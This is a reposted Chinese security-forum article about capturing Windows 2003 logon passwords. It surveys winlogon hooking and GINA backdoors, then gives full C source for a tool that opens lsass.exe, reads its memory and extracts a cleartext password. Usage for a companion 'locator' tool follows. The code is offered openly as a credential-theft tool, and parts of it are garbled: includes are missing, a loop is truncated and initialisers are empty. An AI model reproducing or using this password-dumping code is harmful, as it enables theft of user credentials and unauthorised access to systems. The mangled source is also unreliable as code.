天下网吧 >> 网吧天地 >> 网吧技术 >> 网吧安全 >> 正文

如何在Windows 2003中得到登陆密码

2008-2-18赛迪网佚名

  在所有NT系统中,都是有几种方法可以得到登陆用户的密码的。我知道的三种方法可以达到目的。

  hook了winlogon中几个函数,网上也有这类型的程序,叫winlogonhijack的项目在rootkit.com中有提供,不过那个项目只对本地登陆用户有效,远程登陆用户无效。

  使用Gina和winlogon进行套接,只要对某些函数执行自己的记录密码的代码,就可以将密码记录下来,稳定性高,而且对本地或远程登陆都有效,不过现存的gina后门程序在XP或2003中都有些函数没有被导出过,主要因为xp和2003等在winlogon中加入了新的函数。

  直接读取内存数据得到明文密码。在NT

  4.0/2K中,早就有程序findpass可以直接读到winlogon进程中的内存数据而直接得到登陆用户密码,因为在NT4.0和2K中,帐号的信息,包括域名,帐号和密码都是有规律地在winlogon内存中的特定地址中,所以可以很简单就得到。但在XP和2003系统中,这样方法是无效的了,似乎我们是没有办法直接读出明文地址了。下面我们就来谈谈如何象findpass在NT

  4.0和2K在,在server 2003中得到登陆用户的密码。

  虽然XP和2003是不象以前的NT系统那样将登陆用户信息保存在winlogon进程的内存地址内,但是基Lsass进程对于要处理些信息时,需要得到明文的登陆用户密码,所以登陆用户的密码会在Lsass进程中出现(微软没有将密码在Lsass进程中进行加密,微软的说法是因为Lsass 需要得到明文的密码,就算将密码加密,也都只能用可逆的方法加密,只要跟踪lsass的操作,一样可以得到明文密码,所以微软使用了比较懒惰的方法,可能也是为了加快响应速度,所以将明文密码更是放在lsass进程内存内)。说到这里,大家心里都清楚了,登陆用户的密码是在lsass进程的内存中。对,就是这么一回事,但是要得到这个明文密码,真是象使用NT

  4.0和2K下的findpass那样容易吗?事实上并不是那么容易,因为以下几个原因:

  A.密码存放在lsass进程中的内存地址是没有规律的

  B.密码有可能被最后登陆的用户复盖(例如管理员abc从本地登陆,然后管理员bbb从远程登陆,然后管理员bbb注销终端,存放在 lsass.exe进程内存中的密码,还是管理员bbb的密码),又或者用户登陆后,然后注销了,那么我们就算得到了密码,也不知道是哪个用户的密码。

  C.密码前后的数据也是没有规律的,如果有规律,例如密码前的数据,一定是有一段全是01字符的数据段,那么定位密码就简单。

  原因A和C都给我们带来定位密码的困难,原B就带来不能确定密码和帐号对应的问题.看来微软在新的系统还是做过点功夫。不过我们是不会放弃的,就算是碰碰运气,也看能不能得到密码,反正就算失败,也没什么关系。

  最后的代码,是我写来测试是不是能在2003的系统中得到登际用户的密码,结果也正好象我们上面的分析一样(当然了,上面的结果是用这程序测测得到的)。成功率当然不高,因为受太多原因所影响,定位密码上的困难或者无法定位,或者得到不是密码的信息等等的原因,都令失败率显得相当高,不过总还是一种方法,或者将来有人可以准确定位到,那就是令人高兴了。虽然说失败率高,但在一种情况下,成功率却是很高的,那就是管理员只是在本地或终端中登陆了,以后再没有用户从本地或终端登陆过,而且管理员也没有锁上过系统,那么成功率就会是相当高的了。

  提高成功率的两种做法:

  1.程序直接写成服务,定时检查本地或远程登陆(其实没什么分别),当检测到登陆后,去搜索lsass进程内存,尝试得到密码。

  2.程序模拟一个登陆(使用LogonUser()就能搞定),因为使用LogonUser()这个API,你要提供帐号名和对应的正确的密码,才可以成功,然后你就可以去搜索lsass进程内存。因为知道密码是什么,我们就能定位到密码是保存在什么地方。因为登陆用户的密码都是保存在同一个地址或相离不远的地址中,模拟登陆和搜索,可以先定位以后登陆的用户的密码会大约保存在什么位置。

  无论怎说,三种方法中,最稳定,最安全的方法还是使用Gina那种方法.Hijack了winlogn一些API的方法,毕竟是改动了系统的东西,对系统的稳定性来说,会有考验,直接搜索lsass进程内存的方法呢,虽说也是困难,但准确性,成功率却又是低。

  下面的代码使用的是很笨,而且很原始的搜索方法,主要是搜索Lsass内存中"LocalSystem Remote

  Procedure"这个字符串,因为在相当多的测试中,密码都是保存在有这个字符串的地址后一点的位置中,当然了,很多系统并没有这个字符串,或者就算有,我们得到的都是错误的密码。

  代码:

  //********************************************************************************

  // Version: V1.0

  // Coder: WinEggDrop

  // Date Release: 12/15/2004

  // Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The

  Method

  // Used Is Pretty Unwise,But This May Be The Only Way To Review The

  // Logon User's Password On Windows 2003.

  // Test PlatForm: Windows 2003

  // Compiled On: VC++ 6.0

  //********************************************************************************

  #include

  #include

  #include

  #define BaseAddress 0x002b5000 // The Base Memory Address To Search;The

  Password May Be Located Before The Address Or Far More From This Address,Which

  Causes The Result Unreliable

  char Password[MAX_PATH] = ; // Store The Found Password

  // Function ProtoType Declaration

  //------------------------------------------------------------------------------------------------------

  BOOL FindPassword(DWORD PID);

  int Search(char *Buffer,const UINT nSize);

  DWORD GetLsassPID();

  BOOL Is2003();

  //------------------------------------------------------------------------------------------------------

  // End Of Fucntion ProtoType Declaration

  int main()

  {

  DWORD PID = 0;

  printf("Windows 2003 Password Viewer

  V1.0 By WinEggDrop\n\n");

  if (!Is2003()) // Check Out If The Box Is 2003

  {

  printf("The Program

  Can't Only Run On Windows 2003 Platform\n");

  return -1;

  }

  PID = GetLsassPID(); // Get The Lsass.exe PID

  if (PID == 0) // Fail To Get PID If Returning Zerom

  {

  return -1;

  }

  FindPassword(PID); // Find The Password From Lsass.exe Memory

  return 0;

  }

  // End main()

  //------------------------------------------------------------------------------------

  // Purpose: Search The Memory & Try To Get The Password

  // Return

  Type: int

  // Parameters:

  // In: char *Buffer --> The Memory Buffer To

  Search

  // Out: const UINT nSize --> The Size Of The Memory Buffer

  //

  Note: The Program Tries To Locate The Magic String "LocalSystem Remote

  Procedure",

  // Since The Password Is Near The Above Location,But It's Not

  Always True That

  // We Will Find The Magic String,Or Even We Find It,The

  Password May Be Located

  // At Some Other Place.We Only Look For Luck

  //------------------------------------------------------------------------------------

  int Search(char *Buffer,const UINT nSize)

  {

  UINT OffSet = 0;

  UINT i = 0;

  UINT j = 0 ;

  UINT Count = 0;

  if (Buffer == NULL)

  {

  return -1;

  }

  for (i = 0 ; i 0)

  {

  Password[Count++] =

  Buffer[j];

  }

  else

  {

  break;

  }

  }

  return i + 7; // One

  Flag To Indicate We Find The Password

  }

  }

  }

  return -1; //

  Well,We Fail To Find The Password,And This Always Happens

  }

  // End

  Search

  //------------------------------------------------------------------------------------

  // Purpose: To Get The Lsass.exe PID

  // Return Type: DWORD

  //

  Parameters: None

  //------------------------------------------------------------------------------------

  DWORD GetLsassPID()

  {

  HANDLE hProcessSnap;

  HANDLE hProcess =

  NULL;

  PROCESSENTRY32 pe32;

  DWORD PID = 0;

  hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

  if(

  hProcessSnap == INVALID_HANDLE_VALUE )

  {

  printf("Fail To Create Snap

  Shot\n");

  return 0;

  }

  pe32.dwSize = sizeof(PROCESSENTRY32);

  if( !Process32First(hProcessSnap, &pe32))

  {

  CloseHandle(hProcessSnap); // Must clean up the snapshot object!

  return

  0;

  }

  do

  {

  if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)

  {

  PID =

  pe32.th32ProcessID;

  break;

  }

  }while(Process32Next( hProcessSnap,

  &pe32));

  CloseHandle( hProcessSnap);

  return PID;

  }

  // End GetLsassPID()

  //------------------------------------------------------------------------------------

  // Purpose: To Find The Password

  // Return Type: BOOLEAN

  //

  Parameters:

  // In: DWORD PID -> The Lsass.exe's PID

  //------------------------------------------------------------------------------------

  BOOL FindPassword(DWORD PID)

  {

  HANDLE hProcess = NULL;

  char

  Buffer[5 * 1024] = ;

  DWORD ByteGet = 0;

  int Found = -1;

  hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process

  if

  (hProcess == NULL)

  {

  printf("Fail To Open Process\n");

  return FALSE;

  }

  if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 *

  1024,&ByteGet)) // Read The Memory From Lsass.exe

  {

  printf("Fail To

  Read Memory\n");

  CloseHandle(hProcess);

  return FALSE;

  }

  CloseHandle(hProcess);

  Found = Search(Buffer,ByteGet); // Search The Password

  if (Found >= 0)

  // We May Find The Password

  {

  if (strlen(Password) > 0) // Yes,We

  Find The Password Even We Don't Know If The Password Is Correct Or Not

  {

  printf("Found Password At #0x%x -> \"%s\"\n",Found +

  BaseAddress,Password);

  }

  }

  else

  {

  printf("Fail To Find The

  Password\n");

  }

  return TRUE;

  }

  // End FindPassword

  //------------------------------------------------------------------------------------

  // Purpose: Check If The Box Is Windows 2003

  // Return Type: BOOLEAN

  // Parameters: None

  //------------------------------------------------------------------------------------

  BOOL Is2003()

  {

  OSVERSIONINFOEX osvi;

  BOOL b0sVersionInfoEx;

  ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));

  osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);

  if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))

  {

  osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);

  }

  return

  (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);

  }

  // End

  Is2003()

  // End Of File

  

  附件程序相当于密码定位程序,用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码.

  用法:

  1.locator 字符串 -> 在lsass进程内存中搜索指定的那个"字符串",返回确定的位置

  2.Locator 用户名 密码 ->

  在系统中建立一个参数指定的用户,并进行模拟登陆,然后搜索"密码"在lsass进程内存中的位置,生成的帐户程序运行完后会自动删除。

欢迎访问最专业的网吧论坛,无盘论坛,网吧经营,网咖管理,网吧专业论坛https://bbs.txwb.com

关注天下网吧微信,了解网吧网咖经营管理,安装维护:


本文来源:赛迪网 作者:佚名

声明
本文来源地址:0
声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。若文章侵犯了您的相关权益,请及时与我们联系,我们会及时处理,感谢您对本站的支持!联系Email:support@txwb.com.,本站所有有注明来源为天下网吧或天下网吧论坛的原创作品,各位转载时请注明来源链接!
天下网吧·网吧天下
  • 本周热门
  • 本月热门
  • 阅读排行